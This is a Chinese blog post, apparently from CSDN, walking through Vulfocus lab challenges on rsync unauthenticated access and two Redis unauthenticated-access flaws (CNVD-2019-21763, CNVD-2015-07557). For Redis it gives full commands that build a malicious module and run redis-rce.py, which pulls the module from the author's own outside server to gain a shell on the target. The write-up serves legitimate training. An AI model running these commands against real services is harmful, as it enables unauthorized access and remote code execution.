未授权漏洞vulfocu靶场实战

已于 2024-05-13 15:18:57 修改
阅读量6.9k 收藏 8
点赞数
文章标签: 安全 linux redis
于 2022-03-03 15:51:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beichenyyds/article/details/123256319
版权

rsync未授权漏洞

打开会有一个输入flag的文本框,所以我们需要查找flag如图

把网站的ip信息收集到如图

在kali终端进入 (root💀kali)-[~/vulhub/rsync]目录下输入

rsync rsync://123.58.236.76 :19358/src/

上面也说了flag在tmp目录下所以输入

rsync rsync://123.58.236.76:19358/src/tmp/

可以查到flag 如图

复制到靶场flag位置

可以看到通关

也可到宝塔终端输入相同的命令

效果一样

Redis未授权漏洞(CNVD-2019-21763)

进入宝塔服务器终端执行命令

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand/
make

编译之后继续执行命令

git clone https://github.com/Ridter/redis-rce.git
cd redis-rce/

将RedisModules-ExecuteCommand中的module.so这个文件复制到 同目录下redis-rce

cp module.so ./redis-rce

也可以这样复制

cp ./RedisModules-ExecuteCommand/module.so ./redis-rce

复制过去之后进入redis-rce目录查看到module.so已经复制过去了

安装一个pip 命令为下(前提得有yum) 否则没有python运行脚本

yum -y install python-pip

继续执行。安装一个文本文件

pip install -r requirements.txt

python redis-rce.py -r 123.58.236.76 (靶场ip) -p 40321(靶场端口) -L 121.4.55.89(宝塔服务器端口) -f module.so

宝塔服务器端口放行21000(默认端口)

执行之后

输入ls,直接弹出flag,输入到靶场即可通关

redis 未授权访问 (CNVD-2015-07557)

同上一个redis操作,同理输入代码

python redis-rce.py -r 123.58.236.76  -p 24460 -L 121.4.55.89 -f module.so

flag返回出复制到靶场

成功过关

两个redis操作都一样,改一下端口就OK了

beichenyyds
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Joker零安全手把手教你如何搭建vulfocus靶场
读书 买花 长大
05-28 1905
vulfocus
vulfocus::rocket:Vulfocus是一个扩展集成平台,将打破环境docker合并,放入即可使用,开箱即用
02-02
欢迎来到Vulfocus :rocket: Vulfocus是一个突破集成平台,将突破环境docker扩展,投入即用,开箱即用。 Vulfocus官网: ://fofapro.github.io/vulfocus/ 在线演示: : 背景 进攻靶场是目前每个安全人员以及想学习信息安全的人必备的东西,但目前商业化产品居多,还有一些类似的dvwa,sqli-labs这类的开源项目,但破坏环境比较固定,使用完一次后就失去其作用。建造的成本过高,每次启动的流程会比较繁琐,甚至很多场景是不满足的,之前关于突破性的环境耦合使用多的是vulhub,但是作为企业,高校等以及相关的培训,单纯的突破环境不一定能满足使用的需求,所以我们基于当下的一些靶场项目做出了一些小的改进来符合我们的一些需求,从而增加了标志的形式,来满足一些考核与验证的需求,可以对我们内部人员能力进行考核,于是Vulfocus就诞生了。 认识Vulfocus 因为Vulfocus一个突破性的集成平台,所以可以无限向里添加裂缝环境没有限制,而是是你的内存足够大。破坏下一无法启动的现象。 Vulfocus的docker仓库 Vu
Centos 7下的VulFocus靶场搭建详细教程(含遇到问题解答)
最新发布
天泽岁月
05-29 1277
centos7 部署vulfocus靶场超级详细教程
vulfocus 靶机环境搭建部署
热门推荐
csd_ct的专栏
11-05 1万+
vulfocus 本质上是一个漏洞集成平台,里面集成了大量的CVE漏洞环境,采用的是docker环境部署安装,使用起来方便,可作为一个优秀靶场环境,提升实战能力。可本地部署安装,也可以直接使用线上环境vulfocus (fofa.so)http://vulfocus.fofa.so/#/login?redirect=%2Fdashboard 类似的漏洞集成环境,如vulhub也是一个不错的实验环境,不过vulfocus的漏洞都比较新,但数量少,vulhub收集的漏洞个数较多,但大多...
【网络安全---vulfocus】安装vulfocus教程
m0_67844671的博客
09-09 2104
安装docker镜像,安装vulfocus
Kali+docker搭建Vulfocus靶场并配置vulfocus漏洞环境
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
05-25 7302
kali+docker搭建vulfocus靶场环境,并且在vulfocus靶场添加相对应的安全漏洞环境,方便日常的渗透测试模拟、漏洞复现和安全工具有效性验证等等。最后感谢无私奉献的vulfocus工作人员和开发者。
国产开源网络安全渗透测试集成靶场vulfocus
顺其自然~专栏
10-17 1403
进入项目所在的目录的vulfocus-api文件夹目录下,执行下面命令。
xsser.7z漏洞练习靶场
01-03
**XSSer 7z 漏洞练习靶场** XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器注入恶意脚本,从而控制用户的交互行为或者窃取敏感信息。这个"Xsser.7z漏洞练习靶场...
CSRF漏洞靶场实验
09-19
在“CSRF漏洞靶场实验”,我们将通过实际操作来理解这种攻击方式以及如何防御。 首先,我们需要了解CSRF攻击的基本原理。当用户访问一个网站并登录后,浏览器会保存一个叫做会话(Session)的状态,使得用户在...
一些Web漏洞测试靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
vulhub漏洞测试靶场
08-16
Vulhub涵盖了多种类型的漏洞,如SQL注入、XSS跨站脚本、命令注入、文件包含、授权访问、缓冲区溢出、CSRF跨站请求伪造等。通过实践这些场景,用户可以深入了解每种漏洞的工作原理、攻击方式以及相应的防御策略。 ...
CVE-2021-22192 靶场授权用户 RCE 漏洞.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
vulfocus靶场搭建(docker环境)
cute_phoebe的博客
06-22 7259
vulfocus涵盖众多类型的漏洞,是个练手的好地方
VULFOCUS-redis授权访问(CNVD-2019-21763 )
HAKUNAMATATATTA的博客
11-30 2355
redis授权访问,主从复制RCE
Vulfocus之tomcat系列题目获取flag攻略
weixin_45130489的博客
09-19 2024
快速通关靶场,3个tomcat漏洞的题目。
靶场vulfocus搭建和场景编排
信安是不可或缺的一部分!
05-30 2568
构建的场景的主要选一下比较新的漏洞,不然会出现横向移动很麻烦,还有一些漏洞需要回显,可能就会出现一些问题导致无法无法成功,建议场景搭建好后测试一下可行性,因为是docker可能会有一些命令无法使用,这也会造成一些困难。
grafana 目录遍历(CVE-2021-43798)漏洞复现【VULFOCUS靶场-级】--拿flag的历程
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
05-26 1万+
漏洞名称: grafana 目录遍历 (CVE-2021-43798) 漏洞描述: Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7...
VulnHub--DC-1--flag
记录笔记
04-08 310
配置网络为nat模式(你需要知道你的靶机的IP网段,最好与kali攻击机处于同一网段) 查看net模式下的网段 192.168.15.0 我们查看一下kali的IP地址 kali的IP192.168.15.142 Nmap -Sp 192.168.15.0/24扫描存活主机 我们就的到了DC-1的ip192.168.15.143 我们扫描一下看下开放的端口 目标靶机开放ssh远程连接服务,HTTP服务 whatweb http://192.168.15.143扫描网站指纹信息 或者使用火狐所带的
Redis漏洞总结--授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)
weixin_74985952的博客
09-22 797
由于在Reids 4.x及以上版本新增了模块功能,攻击者可通过外部拓展,在Redis实现一个新的Redis命令。攻击者可以利用该功能引入模块,在授权访问的情况下使被攻击服务器加载恶意.so 文件,从而实现远程代码执行。对于Redis服务的授权访问,首先需要确认Redis授权是否存在,使用Redis数据库客户端进行连接测试,如何没有密码,即授权漏洞存在。漏洞利用有三种利用方式,每种方式都有限制条件,本质就是使用Redis数据库操作语句在目标主机进行写入文件。注意:部分没目录权限读写权限。
哪些漏洞扫描靶场提供参考结果
06-01
虽然漏洞扫描结果通常没有标准答案,但一些漏洞扫描靶场可能会提供参考结果,以帮助使用者更好地理解漏洞扫描的结果和漏洞本质。以下是一些提供参考结果的漏洞扫描靶场: 1. Metasploitable:Metasploitable是一个专门用于测试Metasploit框架的漏洞靶场,其包含了一些已知的漏洞和弱点,可以用于测试漏洞扫描、渗透测试和漏洞利用等技术。 2. DVWA:DVWA(Damn Vulnerable Web Application)是一个专门用于测试Web应用程序漏洞靶场,其包含了一些已知的Web应用程序漏洞和弱点,可以用于测试SQL注入、XSS攻击、文件上传漏洞等常见的Web应用程序漏洞。 3. WebGoat:WebGoat是一个免费的Web应用程序漏洞靶场,其包含了一些常见的Web应用程序漏洞和弱点,可以用于测试SQL注入、XSS攻击、CSRF攻击等常见的Web应用程序漏洞。 需要注意的是,这些参考结果仅供参考,实际的漏洞扫描结果需要结合实际情况进行评估和分析。此外,使用漏洞扫描靶场进行测试时,需要遵守相关法律法规和道德规范,不得用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值